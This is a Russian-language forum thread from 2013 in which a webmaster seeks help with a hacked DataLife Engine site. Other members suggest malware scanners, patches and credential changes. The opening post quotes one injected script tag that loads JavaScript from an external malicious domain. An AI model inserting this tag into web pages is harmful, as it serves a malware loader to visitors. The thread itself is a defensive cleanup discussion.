Форум успешных вебмастеров - GoFuckBiz.com

  Форум успешных вебмастеров - GoFuckBiz.com > Бизнес-решения > Скрипты, программы и технические решения
Дата
USD/RUB58.7930
BTC/USD0.0000
Скрипты, программы и технические решения Обсуждаем скрипты, программы и новые технологии.

Закрытая тема
Опции темы Опции просмотра
Старый 10.12.2013, 21:52   #1
jarosek
jaros
 
Аватар для jarosek
 
Регистрация: 10.05.2009
Адрес: Киев
Сообщений: 1,438
Бабло: $208530
Отправить сообщение для jarosek с помощью ICQ
По умолчанию [HELP] Ломают DLE

Бразы помогите, сабж, ломают сайт один на dle, суют хрень в него и в другие сайты на том же хосте.
шаред хост, логи хранятся только за сегодня, по датам редактирования файлов перерыл все - все чисто.
index.php и файлы шаблонов чистые. но!- вставляется в самом начале страниц такая хрень:
Код:
<nofollow><script language='JavaScript' src=http://37mem4yv28.bestfree.pw/infob.php?i=25659></script></nofollow>
динамика - меняется линк несколько раз в стуки.
я так понял на лету вставляется, вот только откуда - вопрос
хтацесс тоже чист...
чем можно отследить откуда подгружается? или просканить чем?
помогите
спасибо

Последний раз редактировалось jarosek; 10.12.2013 в 22:00.
jarosek вне форума  
Старый 10.12.2013, 22:10   #2
res1dent
Лютый Эникейщик
 
Аватар для res1dent
 
Регистрация: 21.08.2009
Сообщений: 1,462
Бабло: $233740
По умолчанию

Ну начну с того что дле гавно )
попробуй софтом айболит
у тебя гдето в файлах перед формирование хтмл (не в индекс пхп точно, там сам вывод в дле формирует другой файл гдето в дата или где там лежат файлы двига - давненько дле не юзал просто ) идет закоженая строка в бэйс64
вот ее надо и убрать
айболит должен найти обфусцированный код...от него и пляши

еще глянь свеже измененные файлы ...ну вдруг =)
__________________
PharmCash - Лучшие условия и профит в фарме. Hold-0, Refunds-0, Commission–50%, CPU+500. Google нас любит!
res1dent вне форума  
Старый 10.12.2013, 22:14   #3
Strikelol
Senior Member
 
Регистрация: 31.03.2011
Сообщений: 3,056
Бабло: $632595
По умолчанию

dle-news.ru/bags/v97/1549-patchi-bezopasnosti-dlya-versii-97.html

обнови, закрой админку, сохраняй логи
Strikelol вне форума  
Старый 10.12.2013, 22:15   #4
rusawm
Bitcoin to the moon!
 
Аватар для rusawm
 
Регистрация: 19.10.2008
Адрес: горный аул
Сообщений: 2,206
Бабло: $519930
По умолчанию

тачку проверял свою?
смени фтп и не запоминай его в проге
rusawm вне форума  
Старый 10.12.2013, 22:18   #5
awm521212225
Senior Member
 
Аватар для awm521212225
 
Регистрация: 20.03.2012
Сообщений: 863
Бабло: $393585
По умолчанию

аваст вебшел палит, скачай архив с сайтом и просканируй. если дли нуленная, то во всех есть бекдор
__________________
Сторонникам Морали и Нравственности нужно немедленно отрезать хуй, потому что хуй -- это безнравственно.
awm521212225 вне форума  
Старый 10.12.2013, 22:43   #6
Matt Cutts
Senior Member
 
Регистрация: 24.09.2009
Сообщений: 727
Бабло: $94090
Отправить сообщение для Matt Cutts с помощью Skype™
По умолчанию

Шаредхосты кстати тоже ломают. Были истории. Но у тебя, я предположу, скорее всего, нулл с дыркой на опе)
Matt Cutts вне форума  
Старый 10.12.2013, 22:47   #7
jarosek
jaros
 
Аватар для jarosek
 
Регистрация: 10.05.2009
Адрес: Киев
Сообщений: 1,438
Бабло: $208530
ТС -->
Отправить сообщение для jarosek с помощью ICQ
автор темы ТС По умолчанию

нулл, да, нашел еще отдельно клоаку кривую по моб трафу, видимо дыр пиздец...
всем спасибо, вручную так и не нашел, ща буду сканить, отпишу
jarosek вне форума  
Старый 10.12.2013, 22:49   #8
BMW
Ебланнед
 
Регистрация: 17.06.2013
Сообщений: 173
Бабло: $52810
По умолчанию

Все правильно сказали, про сканируй авастом файлы сайта и больше не работай с ДЛЕ особенно нулледом .
BMW вне форума  
Старый 10.12.2013, 22:52   #9
jarosek
jaros
 
Аватар для jarosek
 
Регистрация: 10.05.2009
Адрес: Киев
Сообщений: 1,438
Бабло: $208530
ТС -->
Отправить сообщение для jarosek с помощью ICQ
автор темы ТС По умолчанию

Цитата:
Сообщение от BMW Посмотреть сообщение
Все правильно сказали, про сканируй авастом файлы сайта и больше не работай с ДЛЕ особенно нулледом .
дык не по собственной воле судьба свела
jarosek вне форума  
Старый 11.12.2013, 01:04   #10
jarosek
jaros
 
Аватар для jarosek
 
Регистрация: 10.05.2009
Адрес: Киев
Сообщений: 1,438
Бабло: $208530
ТС -->
Отправить сообщение для jarosek с помощью ICQ
автор темы ТС По умолчанию

в общем просканил авастом все сайты, что на хосте, понаходил кое что, но совсем не то, и чистка не помогла исправить имеено эту проблему...
чем еще можно просканить?

upd.нашел сцуку!
в mysql.class.php и mysql.php по кусочку разбросано было
Всем Спасибо!

Последний раз редактировалось jarosek; 11.12.2013 в 01:13.
jarosek вне форума  
Закрытая тема



Опции темы
Опции просмотра